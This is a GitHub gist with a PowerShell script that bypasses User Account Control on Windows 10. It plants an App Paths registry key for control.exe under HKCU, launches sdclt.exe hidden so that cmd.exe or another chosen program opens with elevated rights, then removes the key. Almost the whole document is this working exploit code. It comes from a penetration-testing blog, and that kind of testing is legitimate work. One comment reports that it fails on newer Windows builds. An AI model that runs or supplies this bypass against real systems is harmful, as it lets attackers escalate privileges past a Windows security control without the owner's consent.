Skip to content

Instantly share code, notes, and snippets.

@netbiosX
Last active May 11, 2021
Embed
What would you like to do?
Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
and starts an elevated command prompt.
 
.NOTES
Function : SdcltUACBypass
File Name : SdcltUACBypass.ps1
Website : pentestlab.blog
 
.LINKS
https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
 
.EXAMPLE
 
Open Command Prompt (it's default):
SdcltUACBypass
 
Open specific application:
SdcltUACBypass -program "cmd.exe"
#>
function SdcltUACBypass(){
Param (
[String]$program = "C:\Windows\System32\cmd.exe" #default
)
 
#Create Registry Structure
New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force
 
#Start sdclt.exe
Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden
 
#Cleanup
Start-Sleep 3
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
 
}
@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Apr 15, 2019

doesn't work in new Windows 10 versions

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment